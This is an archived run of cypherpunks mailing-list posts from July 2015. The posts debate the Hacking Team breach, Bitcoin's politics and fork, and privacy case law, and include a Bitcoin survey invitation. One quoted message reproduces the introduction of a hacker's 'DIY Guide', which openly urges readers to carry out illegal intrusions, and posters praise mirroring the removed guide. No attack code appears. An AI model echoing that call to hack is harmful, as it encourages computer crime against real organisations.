References: <20150710070020.GF61602@r4>
Message-ID: <20150710081130.GB2529@sivokote.iziade.m$>

On Fri, Jul 10, 2015 at 12:17:57AM -0700, Seth wrote:
> On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote:
>
> >Wouldn't it have been enough to post the url?
> >
> >http://ptrace.fefe.de/fpalm30c3.jpg
>
> I actually appreciate content posted in message, get tired of having
> to fire up a browser for links. Also every click on a browser link
> is a potential attack whereas plain-text in an email is not.

Are you sure plain-text email is not a potential attack?

There have been many bugs in text mail clients.

IIRC shell shock affected qmail local delivery (and maybe procmail).

From bizdevcon at protonmail.ch Fri Jul 10 08:38:52 2015
From: bizdevcon at protonmail.ch (BizDevCon)
Date: Fri, 10 Jul 2015 11:38:52 -0400
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
Message-ID:

Yup, same here.

– BizDevCon

-------- Original Message --------
Subject: Re: From: root at hackingteam.it To: vince at hackingteam.it [and who?]
Time (GMT): Jul 10 2015 07:17:57
From: list at sysfu.com
To: cypherpunks at cpunks.org

On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote:

> Wouldn't it have been enough to post the url?
>
> http://ptrace.fefe.de/fpalm30c3.jpg

I actually appreciate content posted in message, get tired of having to fire up a browser for links. Also every click on a browser link is a potential attack whereas plain-text in an email is not.

From coderman at gmail.com Fri Jul 10 11:44:39 2015
From: coderman at gmail.com (coderman)
Date: Fri, 10 Jul 2015 11:44:39 -0700
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References: <20150710070020.GF61602@r4>
Message-ID:

On 7/10/15, Seth wrote:
> On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote:
>
>> Wouldn't it have been enough to post the url?
....
>
> I actually appreciate content posted in message, get tired of having to
> fire up a browser for links. Also every click on a browser link is a
> potential attack whereas plain-text in an email is not.

and another reason,
"2015-00136 removed HackBack: A DIY Guide to unwait whistleblowers July 7, 2015" -> REMOVED

who knows what is most useful information, when placed into the right context? i do know that the most useful information seems to be the least available.

(hence copy) :)

best regards,

From dan at geer.org Fri Jul 10 08:58:12 2015
From: dan at geer.org (dan at geer.org)
Date: Fri, 10 Jul 2015 11:58:12 -0400
Subject: progression of technologies
In-Reply-To: Your message of "Sun, 05 Jul 2015 17:44:21 -0500."
Message-ID: <20150710155812.D78CF2281ED@palinka.tinho.net>

Tom Ritter writes:
| On 24 June 2015 at 22:26, wrote:
| > Paraphrasing Bonnie Raitt, let's give 'em something germane
| > to argue about. In particular, what do I have wrong here:
| >
| > http://www.csmonitor.com/World/Passcode/Passcode-Voices/2015/0617/Opinion-The-reasonable-expectation-fallacy
|
| I'm far from certain, but I think what you have wrong is the notion
| that wavelength doesn't matter.
I think the courts have decided it | does: https://en.wikipedia.org/wiki/Joffe_v._Google,_Inc.#U.S._Supreme_Court | | Specifically, "most of the general public lacks the expertise to | intercept and decode payload data transmitted over a Wi-Fi network." | Therefore the notion that you can point whatever sort of 'camera' you | want at people to capture them isn't accurate. (The other relevant | case is that the police do need a warrant to point infrared cameras at | people's houses.) Well, now we are into dueling Supreme Court cases; see http://caselaw.findlaw.com/us-supreme-court/533/27.html Kyllo v. United States (2001) Despite the Court's attempt to draw a line that is "not only firm but also bright," ante, at 12, the contours of its new rule are uncertain because its protection apparently dissipates as soon as the relevant technology is "in general public use," ante, at 6-7. Yet how much use is general public use is not even hinted at by the Court's opinion, which makes the somewhat doubtful assumption that the thermal imager used in this case does not satisfy that criterion. In any event, putting aside its lack of clarity, this criterion is somewhat perverse because it seems likely that the threat to privacy will grow, rather than recede, as the use of intrusive equipment becomes more readily available. That reads, to me, that what the public adopts limits what I can do or expect. http://geer.tinho.net/geer.rsa.28ii14.txt We Are All Intelligence Officers Now ... In short, we are becoming a society of informants. In short, I have nowhere to hide from you. --dan From coderman at gmail.com Fri Jul 10 12:02:12 2015 From: coderman at gmail.com (coderman) Date: Fri, 10 Jul 2015 12:02:12 -0700 Subject: From: What: [and who?] Message-ID: On 7/10/15, Mirimir wrote: > ... > OK, how many remember waiting for a subpoena during Jim Bell's trial? > > Me, I'd subscribed through a remailer ;) i knew the domain should have stayed on Al-Qaeda.net ... 
Crypto Wars 2.0 and you're worried about receiving an email list? :P

From k at friendlygruppen.se Fri Jul 10 03:25:36 2015
From: k at friendlygruppen.se (ksenia bellman)
Date: Fri, 10 Jul 2015 12:25:36 +0200
Subject: cypherpunks Digest, Vol 25, Issue 9
In-Reply-To:
References:
Message-ID:

on the topic of Bitcoin philosophical musings and pressures:

There is unusually a lot of btc discussion on the list lately: technical (the fork), philosophical and practical.

On the philosophical/political side: btc is great, I like it, I use it, but, come on, we all know that by design (increasing difficulty of the chain and proof-of-work system) btc is determined to be a space race. Before you can maintain the network with simple hardware, and get btc for it, now you have to be a mining rig. We know that btc is good for P2P financial transactions, but the first important question now is: How do you earn bitcoin? (as an individual, you can't mine, if you are not a programmer or a designer, how do you earn btc?) It becomes less and less of a question how do you spend btc, but still, unless I mined a lot in the past or bought it for cash, where do I get it?

Secondly, the rhetoric we hear often in the mainstream btc discussion is "it is a solution for banking the Unbanked" This talk is obviously dodgy - let's say "the unbanked wants to be banked" if you have an account with nothing in it, and no way of filling it in, there is no point. The only good thing about btc wallet vs bank account when it's empty is that there is no one proposing you to get an overdraft or a loan. But still, empty btc wallet is pretty useless.

Rather decent response to political btc frenzy I found in this post -
https://blog.caseykuhlman.com/entries/2014/bitcoin-somaliland.html?utm_source=feedburner&utm_medium=%24feed&utm_campaign=Feed%3A+underWater+desert+Blogging

Another mainstream talk is: it's not about bitcoin, it is all about blockchain technology. That's correct, it can be useful for some stuff. But what drives me up the wall is a hype around it mixed with vagueness. "We can build all this amazing socio-technical systems with it" and very rarely, amongst general public (not blockchain devs) you come across concrete ideas of a design. What exactly does this weird data structure do in a very specific social context? What are exact detailed functions it has, how does it integrate with other layers - software and hardware. So the talk "some devs will write cryptographically verifiable scripts for us which interact on the blockchain and it will give the world some cool ways of interaction" is just dangerous. Similar rhetoric brought humanity things such as Facebook. The only thing which i consider right in the blockchain discussion that "ok, it allows adding some features to a system that can be useful in some particular cases"

On the technical side: fork, xt-code etc - I would like to organise and stream a panel discussion on WCN channel soon-ish. I don't want to turn cypherpunk list into a Bitcoin Talk :) but will ping a link here and the time we will schedule it.

On 8 July 2015 at 01:22, wrote:

> Send cypherpunks mailing list submissions to
> cypherpunks at cpunks.org
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://cpunks.org/mailman/listinfo/cypherpunks
> or, via email, send a message with subject or body 'help' to
> cypherpunks-request at cpunks.org
>
> You can reach the person managing the list at
> cypherpunks-owner at cpunks.org
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of cypherpunks digest..."
>
>
> Today's Topics:
>
> 1. Bitcoin philosophical musings and pressures 7 years in
> [drifted from: txrate, forking, etc] (grarpamp)
> 2. "Google is to surveillance capitalism what GM was to
> managerial capitalism" (Razer)
> 3. Re: Bitcoin philosophical musings and pressures 7 years in
> [drifted from: txrate, forking, etc] (Juan)
> 4.
Re: Hacking Team has been hacked (hard) (Razer) > 5. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Sean Lynch) > 6. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Lodewijk andré de la porte) > 7. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Sean Lynch) > 8. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Lodewijk andré de la porte) > 9. Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] (Juan) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Tue, 7 Jul 2015 15:21:50 -0400 > From: grarpamp > To: Cpunks List > Cc: bitcoin-dev at lists.linuxfoundation.org > Subject: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: > TiTSwbtneL7ps1QsKvzvw at mail.gmail.com> > Content-Type: text/plain; charset=UTF-8 > > > Then again maybe I am missing the key reasoning for this fork. > > People often miss the fundamental reasons Bitcoin exists, > the various conjoined ethos behind its creation. This is to be > expected, it's so far ouside any thinking or life process they've > ever had to do or been exposed to. It's also partly why figuring > out what to do or code or adopt, is hard. And certainly not made > any easier by the long term need and the current value at stake. > > Creating a system in which a Botswanan can give a few bits > of their impoverished wages to their friend in Mumbai without > it being gated, permitted, hierarchied, middlemanned, taxed, > tracked, stolen and feed-upon until pointless... this simply > doesn't compute for these people. Their school of thought is > centralization, profit, control and oppression. 
So of course they > see txrate ramming up against an artificial wall as perfectly fine, > it enables and perpetuates their legacy ways. > > Regardless of whichever technical way the various walls are torn down, > what's important is that they are. And that those who are thinking > outside the box do, and continue to, take time to school these > legacy people such that they might someday become enlightened > and join the ethos. > > Otherwise might as well work for ICBC, JPMC, HSBC, BNP, MUFG > and your favorite government. Probably not as much fun though. > > > ------------------------------ > > Message: 2 > Date: Tue, 07 Jul 2015 13:32:35 -0700 > From: Razer > To: cypherpunks at cpunks.org > Subject: "Google is to surveillance capitalism what GM was to > managerial capitalism" > Message-ID: <559C3763.1000205 at riseup.net> > Content-Type: text/plain; charset="utf-8" > > > > Big Other: Surveillance Capitalism and the Prospects of an Information > > Civilization > > > > Shoshana Zuboff, Berkman Center for Internet & Society; Harvard > > Business School > > > > April 4, 2015 > > > > Abstract: > > This article describes an emergent logic of accumulation in the > > networked sphere, ‘surveillance capitalism,’ and considers its > > implications for ‘information civilization.’ Google is to surveillance > > capitalism what General Motors was to managerial capitalism. Therefore > > the institutionalizing practices and operational assumptions of Google > > Inc. are the primary lens for this analysis as they are rendered in > > two recent articles authored by Google Chief Economist Hal Varian. 
> > > > Varian asserts four uses that follow from computer-mediated > > transactions: ‘data extraction and analysis,’ ‘new contractual forms > > due to better monitoring,’ ‘personalization and customization,’ and > > ‘continuous experiments.’ > > > > An examination of the nature and consequences of these uses sheds > > light on the implicit logic of surveillance capitalism and the global > > architecture of computer mediation upon which it depends. This > > architecture produces a distributed and largely uncontested new > > expression of power that I christen: ‘Big Other.’ It is constituted by > > unexpected and often illegible mechanisms of extraction, > > commodification, and control that effectively exile persons from their > > own behavior while producing new markets of behavioral prediction and > > modification. Surveillance capitalism challenges democratic norms and > > departs in key ways from the centuries long evolution of market > > capitalism. > > > > Number of Pages in PDF File: 15 > > > > Keywords: surveillance capitalism, big data, Google, information > > society, privacy, internet of everything > > http://papers.ssrn.com/sol3/papers.cfm?abstract_id=2594754 > > -------------- next part -------------- > A non-text attachment was scrubbed... 
> Name: signature.asc > Type: application/pgp-signature > Size: 819 bytes > Desc: OpenPGP digital signature > URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150707/74fb2b34/attachment-0001.sig > > > > ------------------------------ > > Message: 3 > Date: Tue, 7 Jul 2015 18:57:16 -0300 > From: Juan > To: cypherpunks at cpunks.org > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: <559c4b24.d6a48c0a.a6394.0140 at mx.google.com> > Content-Type: text/plain; charset=US-ASCII > > On Tue, 7 Jul 2015 15:21:50 -0400 > grarpamp wrote: > > > > Creating a system in which a Botswanan can give a few bits > > of their impoverished wages to their friend in Mumbai > > > What? Bitcoin exists so that rich people in western countries > especially the US can become even richer. So far it worked > pretty well. > > Bitcoin hasn't led to any meaningful political/economic > change yet, apart from possibly triggering the demise of > government cash, which would be a complete disaster. Talk about > 'unintended consequences' (unintended?) > > A likely scenario exists in which there wouldn't be any > independent crypto-currency. There would be fully 'traceable' > electronic currencies controlled as always by the state and the > banking mafia. > > > > > without > > it being gated, permitted, hierarchied, middlemanned, taxed, > > tracked, stolen and feed-upon until pointless... this simply > > doesn't compute for these people. Their school of thought is > > centralization, profit, control and oppression. So of course they > > see txrate ramming up against an artificial wall as perfectly fine, > > it enables and perpetuates their legacy ways. > > > > Regardless of whichever technical way the various walls are torn down, > > what's important is that they are. 
And that those who are thinking > > outside the box do, and continue to, take time to school these > > legacy people such that they might someday become enlightened > > and join the ethos. > > > > Otherwise might as well work for ICBC, JPMC, HSBC, BNP, MUFG > > and your favorite government. Probably not as much fun though. > > > > ------------------------------ > > Message: 4 > Date: Tue, 07 Jul 2015 15:11:20 -0700 > From: Razer > To: cypherpunks at cpunks.org > Subject: Re: Hacking Team has been hacked (hard) > Message-ID: <559C4E88.4050506 at riseup.net> > Content-Type: text/plain; charset="utf-8" > > > > On 07/05/2015 08:31 PM, Christian Gagneraud wrote: > > As nobody has reported it yet, here we go: > > https://twitter.com/hackingteam > > > > Ahhh! Here we go... > > > (In Solidarity with:) “everyone in Gaza, Israeli > > conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, > > anakata, and all other imprisoned hackers, dissidents, and criminals!” > > By the hacker who doxxed Hacking Team: > > > | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | > > | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | > > | _ | (_| | (__| < | |_) | (_| | (__| <|_| > > |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) > > > > A DIY Guide for those without the patience to wait for > whistleblowers > > > > > > --[ 1 ]-- Introduction > > > > I'm not writing this to brag about what an 31337 h4x0r I am and what m4d > sk1llz > > it took to 0wn Gamma. I'm writing this to demystify hacking, to show how > simple > > it is, and to hopefully inform and inspire you to go out and hack shit. > If you > > have no experience with programming or hacking, some of the text below > might > > look like a foreign language. Check the resources section at the end to > help you > > get started. And trust me, once you've learned the basics you'll realize > this > > really is easier than filing a FOIA request. 
> > > > > > --[ 2 ]-- Staying Safe > > > > This is illegal, so you'll need to take same basic precautions: > > http://0x27.me/HackBack/0x00.txt (wget this file if paranoid) > > Via Morgan Mayhem > > https://twitter.com/headhntr/status/618513829282975744 > > Mirrored @ my tumblr > > http://auntieimperial.tumblr.com/post/123489352994 > > > -------------- next part -------------- > A non-text attachment was scrubbed... > Name: signature.asc > Type: application/pgp-signature > Size: 819 bytes > Desc: OpenPGP digital signature > URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150707/3e5a54cc/attachment-0001.sig > > > > ------------------------------ > > Message: 5 > Date: Tue, 07 Jul 2015 22:27:01 +0000 > From: Sean Lynch > To: Juan , cypherpunks at cpunks.org > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: > < > CAHKdp-kqaytz2DJqz-a_wynZNKpi147yNWXMpUfBQWmuLuZu-w at mail.gmail.com> > Content-Type: text/plain; charset="utf-8" > > On Tue, Jul 7, 2015 at 3:02 PM Juan wrote: > > > On Tue, 7 Jul 2015 15:21:50 -0400 > > grarpamp wrote: > > > > > > > Creating a system in which a Botswanan can give a few bits > > > of their impoverished wages to their friend in Mumbai > > > > > > What? Bitcoin exists so that rich people in western countries > > especially the US can become even richer. So far it worked > > pretty well. > > > > Really? What rich person has gotten richer through Bitcoin so far? > Remittances seem like the biggest use of Bitcoin at the moment. Sure, > there's plenty of speculation, but your claim that Bitcoin's purpose is to > make the rich richer is also speculation. And FUD. > > > > Bitcoin hasn't led to any meaningful political/economic > > change yet, apart from possibly triggering the demise of > > government cash, which would be a complete disaster. Talk about > > 'unintended consequences' (unintended?) 
> > > > I can't imagine you've read a single thing written by the people who > influenced the creation of Bitcoin if you think that the collapse of fiat > currencies is an unintended consequence. Any fiat currency that is so bad > that its users prefer to use Bitcoin deserves to collapse. Of course, so > far, while Bitcoin has become popular in places like Argentina and > Venezuela, the US dollar remains by far the more popular alternative > currency in those places. And if Greece exits the Euro and starts printing > Drachmas there, they will have to worry about people trading their Drachmas > for Euros, not for Bitcoin. > > > > A likely scenario exists in which there wouldn't be any > > independent crypto-currency. There would be fully 'traceable' > > electronic currencies controlled as always by the state and the > > banking mafia. > > > > By what evidence do you estimate that this is a "likely" scenario? You may > be right that many nation-states and banks will be loathe to accept an > untraceable and uncontrollable crypto-currency, but that's the whole point; > they're not going to have a choice. Cryptocurrencies don't have to be legal > to be disruptive. The main problem that they've run up against before now > is the lack of healthy underground markets to take advantage of them. Given > time, governments' and banks' opinions and policies about cryptocurrencies > will become irrelevant. > -------------- next part -------------- > An HTML attachment was scrubbed... 
> URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150707/842a6c5c/attachment-0001.html > > > > ------------------------------ > > Message: 6 > Date: Wed, 8 Jul 2015 07:50:04 +0900 > From: Lodewijk andré de la porte > To: Sean Lynch > Cc: "cypherpunks at cpunks.org" > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: > < > CAHWD2rLq2QpL+LM8NvS5yhiAEm7zUDKFqXrbrAsabLWzV7XmdA at mail.gmail.com> > Content-Type: text/plain; charset="utf-8" > > 2015-07-08 7:27 GMT+09:00 Sean Lynch : > > > What? Bitcoin exists so that rich people in western countries > >> especially the US can become even richer. So far it worked > >> pretty well. > >> > > > > Really? What rich person has gotten richer through Bitcoin so far? > > Remittances seem like the biggest use of Bitcoin at the moment. Sure, > > there's plenty of speculation, but your claim that Bitcoin's purpose is > to > > make the rich richer is also speculation. And FUD. > > > > Yours would the Uncertainty and Doubt, I see. > > Bitcoin is cold hard money - therefore benefiting those that can exploit it > best. The most capital you have, the better you can exploit it. Therefore, > the wealthy stand more to benefit from Bitcoin than anyone else. Any other > effect would indicate softness of Bitcoin or some human issue. It does > prevent (certain forms of) suppression; it's very hard to censor financial > transactions on the Bitcoin network. It also provides a great deal of > financial and administrative utility to all in similar quantity, it levels > the playing field of the poor/rich somewhat. > -------------- next part -------------- > An HTML attachment was scrubbed... 
> URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150708/698a4393/attachment-0001.html > > > > ------------------------------ > > Message: 7 > Date: Tue, 07 Jul 2015 22:53:36 +0000 > From: Sean Lynch > To: Lodewijk andré de la porte > Cc: "cypherpunks at cpunks.org" > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: > DWWPs-hkkYPwFg at mail.gmail.com> > Content-Type: text/plain; charset="utf-8" > > On Tue, Jul 7, 2015 at 3:50 PM Lodewijk andré de la porte > wrote: > > > 2015-07-08 7:27 GMT+09:00 Sean Lynch : > > > >> What? Bitcoin exists so that rich people in western countries > >>> especially the US can become even richer. So far it worked > >>> pretty well. > >>> > >> > >> Really? What rich person has gotten richer through Bitcoin so far? > >> Remittances seem like the biggest use of Bitcoin at the moment. Sure, > >> there's plenty of speculation, but your claim that Bitcoin's purpose is > to > >> make the rich richer is also speculation. And FUD. > >> > > > > Yours would the Uncertainty and Doubt, I see. > > > > Bitcoin is cold hard money - therefore benefiting those that can exploit > > it best. The most capital you have, the better you can exploit it. > > Therefore, the wealthy stand more to benefit from Bitcoin than anyone > else. > > Any other effect would indicate softness of Bitcoin or some human issue. > It > > does prevent (certain forms of) suppression; it's very hard to censor > > financial transactions on the Bitcoin network. It also provides a great > > deal of financial and administrative utility to all in similar quantity, > it > > levels the playing field of the poor/rich somewhat. > > > > Perhaps my response was a bit hyperbolic, but that is a very different > claim than "Bitcoin exists so that rich people in western countries > especially the US can become even richer." > -------------- next part -------------- > An HTML attachment was scrubbed... 
> URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150707/51f23c6b/attachment-0001.html > > > > ------------------------------ > > Message: 8 > Date: Wed, 8 Jul 2015 08:21:48 +0900 > From: Lodewijk andré de la porte > To: Sean Lynch > Cc: "cypherpunks at cpunks.org" > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: > bz0hQ at mail.gmail.com> > Content-Type: text/plain; charset="utf-8" > > 2015-07-08 7:53 GMT+09:00 Sean Lynch : > > > > Perhaps my response was a bit hyperbolic, but that is a very different > > claim than "Bitcoin exists so that rich people in western countries > > especially the US can become even richer." > > > > Put on your Juanglasses and the difference is hardly perceptible ;) > > Still not sure what to make of the guy's constant rant-mode. It just seems > to cause defensive and less constructive argumentation. > -------------- next part -------------- > An HTML attachment was scrubbed... > URL: < > http://cpunks.org/pipermail/cypherpunks/attachments/20150708/8a247750/attachment-0001.html > > > > ------------------------------ > > Message: 9 > Date: Tue, 7 Jul 2015 20:22:32 -0300 > From: Juan > To: cypherpunks at cpunks.org > Subject: Re: Bitcoin philosophical musings and pressures 7 years in > [drifted from: txrate, forking, etc] > Message-ID: <559c5f23.c328370a.7776d.1c71 at mx.google.com> > Content-Type: text/plain; charset=US-ASCII > > On Tue, 07 Jul 2015 22:27:01 +0000 > Sean Lynch wrote: > > > On Tue, Jul 7, 2015 at 3:02 PM Juan wrote: > > > > > On Tue, 7 Jul 2015 15:21:50 -0400 > > > grarpamp wrote: > > > > > > > > > > Creating a system in which a Botswanan can give a few bits > > > > of their impoverished wages to their friend in Mumbai > > > > > > > > > What? Bitcoin exists so that rich people in western > > > countries especially the US can become even richer. So far it worked > > > pretty well. > > > > > > > Really? 
What rich person has gotten richer through Bitcoin so far? > > > It seems kinda obvious that virtually all bitcoin developers > and users *in the west* are richer than people in Africa and > India. > > That's what I was getting at. Bitcoin devs - *already > rich by 'third world' standards* - are richer now. Millionaires > even (notice that grarpamp was talking about impoverished > wages...and people) > > > > > Remittances seem like the biggest use of Bitcoin at the moment. Sure, > > there's plenty of speculation, but your claim that Bitcoin's purpose > > is to make the rich richer is also speculation. And FUD. > > > So what amount of btc is being used to make payments between > Botswana and Mumbai? > > What amount of btc is being used to speculate/gamble in a few > big, centralized and fully NSA-AML-monitored exchanges? > > > > > > > > > Bitcoin hasn't led to any meaningful political/economic > > > change yet, apart from possibly triggering the demise of > > > government cash, which would be a complete disaster. Talk > > > about 'unintended consequences' (unintended?) > > > > > > > I can't imagine you've read a single thing written by the people who > > influenced the creation of Bitcoin if you think that the collapse of > > fiat currencies is an unintended consequence. > > > But I said *cash* not fiat. And the collapse of relatively > untraceable *cash* is *bad*. > > What we may end up with is FIAT currencies and NO CASH > option* for those fiat currencies. Bad. Pretty bad. > > > *aka credit cards. > > > > Any fiat currency that > > is so bad that its users prefer to use Bitcoin deserves to collapse. > > Of course, so far, while Bitcoin has become popular in places like > > Argentina > > Do you know where I live? Of course you don't have to know > where I live. But you'll know it in a second anyway. I live in > argentina - and let me tell you, bitcoin isnt exactly 'popular' > here. 
> > > > and Venezuela, the US dollar remains by far the more > > popular alternative currency in those places. > > Yep, that's quite correct as far as argentina goes. I suspect > it's true regarding venezuela as well. > > > > > And if Greece exits the > > Euro and starts printing Drachmas there, they will have to worry > > about people trading their Drachmas for Euros, not for Bitcoin. > > > > > > > > > > > A likely scenario exists in which there wouldn't be any > > > independent crypto-currency. There would be fully > > > 'traceable' electronic currencies controlled as always by the state > > > and the banking mafia. > > > > > > > By what evidence do you estimate that this is a "likely" scenario? > > > The evidence is called 'history'. That, and the nature of > government and its business 'partners' - or accomplices. > > > > You may be right that many nation-states and banks will be loathe to > > accept an untraceable and uncontrollable crypto-currency, but that's > > the whole point; > > You seem to be assuming that an uncontrollable and untraceable > crypto-currency exist? I'm not seeing anything of the sort. > > > > they're not going to have a choice. Cryptocurrencies > > don't have to be legal to be disruptive. > > And yet there seems to be a fair amount of people in the bitcoin > 'community' who are quite eager (or desperate) to have bitcoin > 'regulated' so that it becomes 'respectable', 'legal'...and > usable. > > Of course, this isn't a shortcoming that only affects btc. > Anything that the government 'outlaws' becomes harder to > transact. > > > > > The main problem that > > they've run up against before now is the lack of healthy underground > > markets to take advantage of them. Given time, governments' and > > banks' opinions and policies about cryptocurrencies will become > > irrelevant. > > > I do wish that was actually the case, but I think that view > doesn't fully take into account the capabilities of the > 'enemy'. > > > > J. 
>
>
>
>
>
> ------------------------------
>
> Subject: Digest Footer
>
> _______________________________________________
> cypherpunks mailing list
> cypherpunks at cpunks.org
> https://cpunks.org/mailman/listinfo/cypherpunks
>
>
> ------------------------------
>
> End of cypherpunks Digest, Vol 25, Issue 9
> ******************************************
>

From shelley at misanthropia.org Fri Jul 10 13:26:35 2015
From: shelley at misanthropia.org (Shelley)
Date: Fri, 10 Jul 2015 13:26:35 -0700
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References: <20150710070020.GF61602@r4>
Message-ID: <20150710202619.6089EC0001F@frontend1.nyi.internal>

On July 10, 2015 11:52:10 AM coderman wrote:

> On 7/10/15, Seth wrote:
> > On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote:
> >
> >> Wouldn't it have been enough to post the url? ....
> >
> > I actually appreciate content posted in message, get tired of having to
> > fire up a browser for links. Also every click on a browser link is a
> > potential attack whereas plain-text in an email is not.
>
>
> and another reason,
> "2015-00136 removed HackBack: A DIY Guide to unwait whistleblowers
> July 7, 2015"
> -> REMOVED
>
>
> who knows what is most useful information, when placed into the right context?
>
> i do know that the most useful information seems to be the least
> available. (hence copy)
>
> :)
>

Agreed. Now it's archived on countless HDDs and mirrors, good thinking!

Many of us already are on any number of "lists" anyway; I'm sure just subscribing to this list puts us on yet another. I stopped worrying about that stuff long ago. It's just an intimidation tactic to try to get us to self-censor ourselves and save them the trouble. Fuck them and fuck that. You're on "lists" no matter what you do, or do not do. I'm not on Facebook or any other social media- that's definitely a list-able offense ;) Just ignore them and use the regular, common sense precautions that should be part of your daily routine anyway.

*This is also in response to your subsequent email, which is probably apparent :D

-S

From grarpamp at gmail.com Fri Jul 10 13:34:29 2015
From: grarpamp at gmail.com (grarpamp)
Date: Fri, 10 Jul 2015 16:34:29 -0400
Subject: Bitcoin User??? A Euro worth of BTC for your thoughts...
Message-ID:

If you are interested in improving Bitcoin, and making about a Euro (4.2 mBTC) in return, read on...

We are researchers conducting a Bitcoin user study and are seeking participants. Bitcoin users are kindly invited to participate. Our survey is anonymous and takes under 10 minutes to complete. As a reward you receive BTC. The goal of this survey is to learn about user perceptions regarding Bitcoin and will cover aspects such as key management, wallet usage and risk perception. As we believe that these results will be valuable to the entire community, we will publish our results and make them available to everyone.

This is the link to the survey:
https://www.soscisurvey.de/BTC_study/?r=932181

SBA Research

SBA Research was founded in 2006 as the first Austrian research center for information security by the TU Wien, the Graz University of Technology and the University of Vienna. Funded largely by the national initiative for COMET. Along with many other international academic and business research partners we jointly work on challenges ranging from organizational to technical security. We are 100 strong.
https://www.sba-research.org/

SoSci Survey

SoSci Survey can help you carry out your professional online survey: create online questionnaire, send invitations (including follow-ups), Data download (SPSS, GNU R, Excel). It was designed specifically for scientific surveys and is continuously developed for daily research practice.
The software supports a project manager and allows flexibility in the design of questionnaires. The most demanding and complex designs can be realized. https://www.soscisurvey.de/ From juan.g71 at gmail.com Fri Jul 10 13:22:50 2015 From: juan.g71 at gmail.com (Juan) Date: Fri, 10 Jul 2015 17:22:50 -0300 Subject: cypherpunks Digest, Vol 25, Issue 9 In-Reply-To: References: Message-ID: <55a02976.066a8c0a.92c55.fffff74d@mx.google.com> On Fri, 10 Jul 2015 12:25:36 +0200 ksenia bellman wrote: > Before you can maintain the network with simple hardware, > and get btc for it, now you have to be a mining rig. Right. > We know that btc > is good for P2P financial transactions, Well, that's the theory, but as you just mentioned, at least part of the network isn't looking too much P2P-like anymore... > but the first important > question now is: How do you earn bitcoin? (as an individual, you > can't mine, if you are not a programmer or a designer, how do you > earn btc?) Working for people who pay in btc. For instance, selling drugs to them =) > It becomes less and less of a question how do you spend > btc, but still, unless I mined a lot in the past or bought it for > cash, where do I get it? I don't think that's really a problem. You can earn btc like you earn any other kind of money. Or you could at least if btc was a common medium of exchange. (you can of course simply buy btc) > > Secondly, the rhetoric we hear often in the mainstream btc discussion > is "it is a solution for banking the Unbanked" This talk is obviously > dodgy - lets say "the unbanked wants to be banked" But why should they? So that they can be easily monitored? THAT is dodgy too. > if you have an > account with nothing in it, and no way of filling it in, there is no > point. The only good thing about btc walled vs bank account when its > empty is that there is no one is proposing you to get an overdraft or > a loan. But still, empty btc wallet is pretty useless. 
>
> Rather decent response to political btc frenzy I found in this post -
> https://blog.caseykuhlman.com/entries/2014/bitcoin-somaliland.html?utm_source=feedburner&utm_medium=%24feed&utm_campaign=Feed%3A+underWater+desert+Blogging

Sorry, that's a typically retarded rant against 'anarchy'. Bitcoin isn't the same thing as political anarchy so valid criticism of bitcoin isn't the same thing as valid criticism of political anarchy.

"If You Want to Sit At The Adults' Table Act Like Adults"

Adults know the basic meaning of words and know that the STATE of somaliland isn't 'anarchy'. Adults are intellectually honest. Unlike the author of the article you linked.

>
> Another mainstream talk is: it's not about bitcoin, it is all about
> blockchain technology. That's correct, it can be useful for some
> stuff. But what drives me up the wall is a hype around it mixed with
> vagueness.

Yep. It is mostly bullshit. Blockchain 'technology' (technology? it's just an algorithm) seems like a more robust version of digital signatures. And what of it? What kind of fundamental problem does a better digital signature system solve?

> "We can build all these amazing socio-technical systems
> with it"

That is bullshit. But that bullshit is not the same as the political theory of anarchy. In other words don't confuse bitcoin with anarchy, regardless of what bitcoin pushers may say.

> and very rarely, amongst general public (not blockchain
> devs) you come across concrete ideas of a design. What exactly does
> this weird data structure do in a very specific social context?
> What are exact detailed functions it has, how does it integrate with
> other layers - software and hardware. So the talk "some devs will
> write cryptographically verifiable scripts for us which interact on
> the blockchain and it will give the world some cool ways of
> interaction" is just dangerous. Similar rhetoric brought humanity
> things such as Facebook.
The only thing which i consider right in the
> blockchain discussion that "ok, it allows adding some features to a
> system that can be useful in some particular cases"
>
> On the technical side: fork, xt-code etc - I would like to organise
> and stream a panel discussion on WCN
> channel soon-ish. I don't want to
> turn cypherpunk list into a Bitcoin Talk :) but will ping a link here
> and the time we will schedule it.
>
>

From grarpamp at gmail.com Fri Jul 10 14:41:23 2015
From: grarpamp at gmail.com (grarpamp)
